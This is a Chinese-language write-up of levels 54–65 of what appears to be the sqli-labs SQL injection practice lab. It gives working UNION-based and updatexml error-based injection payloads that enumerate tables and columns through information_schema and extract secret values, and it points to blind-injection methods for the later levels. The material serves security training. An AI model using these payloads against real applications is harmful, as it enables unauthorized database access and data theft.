sql-54

翻译一下页面，得知我们只有十次机会。id参数是单引号闭合。

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 

我得到的表名是igsyiz2p7z。（每个人得到的应该都不一样，所以后面的代码要改一下）

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='igsyiz2p7z'--+

?id=-1' union select 1,group_concat(secret_0GZU),3 from igsyiz2p7z--+ 

这样就得到我们的key值了，提交了即可。

sql-55

这关有14次机会，id是括号闭合。

?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 

?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='jsoh4368gx'--+

?id=-1' union select 1,group_concat(secret_D93I),3 from jsoh4368gx--+ 

sql-56

14次机会，’）闭合。跟前两关类似，在这里就不写步骤了。

sql-57

双引号闭合，跟上面几关一样。

sql-58

这关少于五次的机会，单引号闭合。使用报错注入即可。

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+
?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='kecj1r7f3t')),3)--+
?id=1' and updatexml(1,concat(1,(select group_concat(secret_8HG4) from kecj1r7f3t )),3) --+

sql-59

这关是整数型，方法跟上一关一样。

sql-60

闭合类型是")，方法跟前两关一样。

sql-61

闭合类型是'))，方法同上。

sql-62

闭合类型是单引号加括号。没有报错信息，联合注入也没有注入点，所以这关只能使用布尔盲注或时间盲注，具体步骤可以看

时间盲注：Blind- Time based-Single Quotes-String--SQL注入-CSDN博客

布尔盲注：Blind-Boolian-Single Quotes-String--SQL注入-CSDN博客

sql-63

单引号闭合，方法同上。

sql-64

闭合类型是))，方法同上。

sql-65

闭合类型是")，方法同上。

总结

       sql全部关卡到这就结束了，总结一下方法有：联合注入，报错注入，堆叠注入，时间盲注，布尔盲注，宽字节注入，外带注入，头部注入，二次注入，外带注入。通过实践练习可以更好地掌握这些注入技术。